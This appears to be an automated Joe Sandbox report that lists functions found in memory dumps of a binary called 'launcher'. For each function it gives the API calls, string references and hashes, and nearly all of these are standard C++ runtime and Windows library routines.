Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: 9adb19e83b5d4479ac2301d3230078cb469083c5b4be8cf0122ccc3840e5f785
Instruction ID: 9c7155945b14a18ec5d210cbed4912c0ab396fbf338a9a38e433085856b11e9a
Opcode Fuzzy Hash: 9adb19e83b5d4479ac2301d3230078cb469083c5b4be8cf0122ccc3840e5f785
Instruction Fuzzy Hash: D7D09272546A20ABC310AFB4BC4989A3FF9FA09B113018192F881D33E0DFFD85108A94

Function 00B54F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bc6d7c28e80b390f1d843b4c75e4f8076a01906ac14cb773657a2c265cbea61
Instruction ID: 12c79a3e9b5f3e5a356f978b55807b2534f109a669337a8e2a8593d2a48242eb
Opcode Fuzzy Hash: 1bc6d7c28e80b390f1d843b4c75e4f8076a01906ac14cb773657a2c265cbea61
Instruction Fuzzy Hash: 31B1F570E04A49AFDB21DFA9C890BADBBF1EF45306F1441D8E9059B391CB719D45CBA0

Function 00B39B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00B39C97
std::_Throw_Cpp_error.LIBCPMT ref: 00B39CA8
std::_Throw_Cpp_error.LIBCPMT ref: 00B39CBC
std::_Throw_Cpp_error.LIBCPMT ref: 00B39CDD
std::_Throw_Cpp_error.LIBCPMT ref: 00B39CEE
std::_Throw_Cpp_error.LIBCPMT ref: 00B39D06

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID:
API String ID: 2134207285-0
Opcode ID: e6c931bafc9b30aafbb6ceed169367079d3a5c85c5de10579396c2f6c422fb46
Instruction ID: b3cce01bf49fbbf50954fd9bee9502c627d0a3fa8df9dd9a6821ef36256579b5
Opcode Fuzzy Hash: e6c931bafc9b30aafbb6ceed169367079d3a5c85c5de10579396c2f6c422fb46
Instruction Fuzzy Hash: 0C41D5B1900740CBDB309B648942BAFB7F8EF45320F3806ADD57A262D1D7B1A904CB52

Function 00B4ACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B4ACDE,00B40760,00B3B77F,DA36A356,?,?,?,?,00B5BFCA,000000FF), ref: 00B4ACF5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B4AD03
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B4AD1C
SetLastError.KERNEL32(00000000,?,00B4ACDE,00B40760,00B3B77F,DA36A356,?,?,?,?,00B5BFCA,000000FF), ref: 00B4AD6E

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3f5d08b5bf2b546aefe79e27588e3a138a22ba2c01898fa1d95178a5069ffc62
Instruction ID: 9b5a764693b71f2c6dbaf90e810334e8677de30a3d295bbbb92cc13670d5b021
Opcode Fuzzy Hash: 3f5d08b5bf2b546aefe79e27588e3a138a22ba2c01898fa1d95178a5069ffc62
Instruction Fuzzy Hash: B101FC3264A615AEA72427787C85D262BD4EB01F7672003BBFA10975F0EF964D46B181

Function 00B4B56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B4B68D
CallUnexpected.LIBVCRUNTIME ref: 00B4B906

Strings

csm, xrefs: 00B4B618
csm, xrefs: 00B4B5AB
csm, xrefs: 00B4B6C4

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: d44e8a66d3385605944d8892cd625422789c9e1234483c966aa4db82671767ce
Instruction ID: d49ddefbf3b799c13f3cd46c6dd43864536b3dd1cc8f7fa4f6cb07d8ff5248b0
Opcode Fuzzy Hash: d44e8a66d3385605944d8892cd625422789c9e1234483c966aa4db82671767ce
Instruction Fuzzy Hash: 71B14571800219EFCF18DFA4C881DAEBBF9EF54310B15459AEA116B212D731DB61EF92

Function 00B3BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00B3BF44
std::_Ref_count_base::_Decref.LIBCPMT ref: 00B3C028

Strings

RCC, xrefs: 00B3BEAB
MOC, xrefs: 00B3BE9F
csm, xrefs: 00B3BEB7

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: 2c8def2fcf2d9ca41a6a3377e7fdad5689ae28533be6d7ca9c9f240e09a5e07b
Instruction ID: c95f036dc274fd1edd02fafe8c47529a2a14aa12b50d95e09a6a561549170632
Opcode Fuzzy Hash: 2c8def2fcf2d9ca41a6a3377e7fdad5689ae28533be6d7ca9c9f240e09a5e07b
Instruction Fuzzy Hash: D741AB75900208DFCF28DF68C945DAEB7F5EF48300F6880DDE649A7646CB34AA04CB52

Function 00B455C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DA36A356,?,?,00000000,00B5BE94,000000FF,?,00B45685,00000002,?,00B45721,00B48396), ref: 00B455F9
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B4560B
FreeLibrary.KERNEL32(00000000,?,?,00000000,00B5BE94,000000FF,?,00B45685,00000002,?,00B45721,00B48396), ref: 00B4562D

Strings

CorExitProcess, xrefs: 00B45603
mscoree.dll, xrefs: 00B455F2

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2632a53f306d8142fc42d9b35ee2dee519ad2915a71b619df43e40d19da7ad07
Instruction ID: 21e68603d4b81c3bbc89dfbb9bf6d3b37742e426660cc050384829ab03fd2b1c
Opcode Fuzzy Hash: 2632a53f306d8142fc42d9b35ee2dee519ad2915a71b619df43e40d19da7ad07
Instruction Fuzzy Hash: 4E016231A40A59AFDB119F54DC09FAEBBF8FB04B15F010565F811A32E0DFB89A04CA90

Function 00B4D6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00B4D76F
__alloca_probe_16.LIBCMT ref: 00B4D838
__freea.LIBCMT ref: 00B4D89F

Part of subcall function 00B4BF11: RtlAllocateHeap.NTDLL(00000000,00B4DF35,?,?,00B4DF35,00000220,?,00000000,?), ref: 00B4BF43

__freea.LIBCMT ref: 00B4D8B2
__freea.LIBCMT ref: 00B4D8BF

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 7d785a2022e0c4afdb885c590c68cd556e008e42d2b66386655bdcfd8b108974
Instruction ID: f2ff9744b3838854cdfdd9707430bd38eff4df4d766ec92f303743ee70d26c08
Opcode Fuzzy Hash: 7d785a2022e0c4afdb885c590c68cd556e008e42d2b66386655bdcfd8b108974
Instruction Fuzzy Hash: 8051A672A00206AFEB215F61CC81EBB7BE9EF44750F2506B9FD14D7251EB70DE50A6A0

Function 00B3EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B3F005
AcquireSRWLockExclusive.KERNEL32(00B38E38), ref: 00B3F024
AcquireSRWLockExclusive.KERNEL32(00B38E38,00B3A2F0,?), ref: 00B3F052
TryAcquireSRWLockExclusive.KERNEL32(00B38E38,00B3A2F0,?), ref: 00B3F0AD
TryAcquireSRWLockExclusive.KERNEL32(00B38E38,00B3A2F0,?), ref: 00B3F0C4

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: e2fed96066be7f60d26fe4bbb5ed8535e95fb4be93110b700d72563840e8749b
Instruction ID: 87a83a3317751c1a0077e6e1c9a8534f306a7aef534576e7f940f1cbf78aa667
Opcode Fuzzy Hash: e2fed96066be7f60d26fe4bbb5ed8535e95fb4be93110b700d72563840e8749b
Instruction Fuzzy Hash: E3414671900A0BDBCB28CF69C48197AB3F5FF04311F3049BAE45697652DB74E985CB51

Function 00B33C70 Relevance: 7.6, APIs: 5, Instructions: 111COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B33CA5
std::_Lockit::_Lockit.LIBCPMT ref: 00B33CBF
std::_Lockit::~_Lockit.LIBCPMT ref: 00B33CE0
__Getctype.LIBCPMT ref: 00B33D92
std::_Lockit::~_Lockit.LIBCPMT ref: 00B33DD8

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
String ID:
API String ID: 3087743877-0
Opcode ID: 2a80786a9b8e6e8f1d68ce22b55b22d437d05095f9d5e24b87e0def1f76204d5
Instruction ID: aebef4b8a82e1180b1270bacb7bf5557d17ec8b5065985387944517ccc53cac0
Opcode Fuzzy Hash: 2a80786a9b8e6e8f1d68ce22b55b22d437d05095f9d5e24b87e0def1f76204d5
Instruction Fuzzy Hash: CC414771E002188BCB14DF94C840BAEBBF1FF44B20F2482A9D8556B391DB78AE45CB91

Function 00B3D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B3D4C9
std::_Lockit::_Lockit.LIBCPMT ref: 00B3D4D3
int.LIBCPMT ref: 00B3D4EA

Part of subcall function 00B3C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00B3C1F6
Part of subcall function 00B3C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00B3C210

codecvt.LIBCPMT ref: 00B3D50D
std::_Lockit::~_Lockit.LIBCPMT ref: 00B3D544

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
String ID:
API String ID: 3716348337-0
Opcode ID: 41682d9847e615aca621b9ec35871ef186d0a41bed3cb48e5580697c5640d962
Instruction ID: 1453feb5751ebf5552f9c6a5027d1cbdbb170f08aaab3cc2a0c35c836cffca48
Opcode Fuzzy Hash: 41682d9847e615aca621b9ec35871ef186d0a41bed3cb48e5580697c5640d962
Instruction Fuzzy Hash: 0E01D6319001159FCB05EBA8D901ABEBBF5AF94324F350599F815AB2C2DF749E04C791

Function 00B3ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B3ADDE
std::_Lockit::_Lockit.LIBCPMT ref: 00B3ADE9
std::_Lockit::~_Lockit.LIBCPMT ref: 00B3AE57

Part of subcall function 00B3ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00B3ACC2

std::locale::_Setgloballocale.LIBCPMT ref: 00B3AE04
_Yarn.LIBCPMT ref: 00B3AE1A

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: f0a3ab0fd842b9927e2fb8342bc7b69b99b7de42c106bff8c43d17c80e9aa340
Instruction ID: 018ecf1cacce8990502114d0a2389f88286385a0e42ad26f8e3662d84e2ba55c
Opcode Fuzzy Hash: f0a3ab0fd842b9927e2fb8342bc7b69b99b7de42c106bff8c43d17c80e9aa340
Instruction Fuzzy Hash: 91019A75A006619BCB06EB20D85297D7BE1FF88750F340099E846573C1CF78AE42CB82

Function 00B3B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00B3B809

Strings

MOC, xrefs: 00B3B789
RCC, xrefs: 00B3B795
csm, xrefs: 00B3B7A1

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: 437d809e37485b8aca23fd6c387be4847f0228163c67052b7d82073654aeb43c
Instruction ID: c3299c4f769664f1d36cd648233dbe6523245481da504a74465600632b1a95c4
Opcode Fuzzy Hash: 437d809e37485b8aca23fd6c387be4847f0228163c67052b7d82073654aeb43c
Instruction Fuzzy Hash: AB21C235901709DFCF289F94C855F6AB7ECEF40720F3445AEE6118B694DB34AE40CA91

Function 00B56940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B569DC,00000000,?,00B6D2B0,?,?,?,00B56913,00000004,InitializeCriticalSectionEx,00B60D34,00B60D3C), ref: 00B5694D
GetLastError.KERNEL32(?,00B569DC,00000000,?,00B6D2B0,?,?,?,00B56913,00000004,InitializeCriticalSectionEx,00B60D34,00B60D3C,00000000,?,00B4BBBC), ref: 00B56957
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B5697F

Strings

api-ms-, xrefs: 00B56964

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 343c9c26def240c172c2ea5418c7794e95b55b4cd5c45617f635c392ba575144
Instruction ID: 95d9356308f53ab8dbefee08cdc36851124b32081d3c18e8c27e215f20f42235
Opcode Fuzzy Hash: 343c9c26def240c172c2ea5418c7794e95b55b4cd5c45617f635c392ba575144
Instruction Fuzzy Hash: 02E01A31380204BAEF201B60EC46B6C3B95EB54B92F5404B0FE4CA94E0EBB5EC589984

Function 00B53F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(DA36A356,00000000,00000000,?), ref: 00B54001

Part of subcall function 00B4C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B4D895,?,00000000,-00000008), ref: 00B4C082

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B54253
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B54299
GetLastError.KERNEL32 ref: 00B5433C

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: c4e56fb8e2e9fa8f0769013df39e7aee5062ab24c2db982e3d50a976e4e10298
Instruction ID: 289ed1d4b0c6697182667193bbfe2be122a55d383213fa34753e39da70d624a9
Opcode Fuzzy Hash: c4e56fb8e2e9fa8f0769013df39e7aee5062ab24c2db982e3d50a976e4e10298
Instruction Fuzzy Hash: 7ED16A75D002589FCB15CFA8C880AEDBBF5FF09318F2845AAE955EB351DB30A985CB50

Function 00B4B295 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00B4B35C
___AdjustPointer.LIBCMT ref: 00B4B37F
___AdjustPointer.LIBCMT ref: 00B4B41B

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

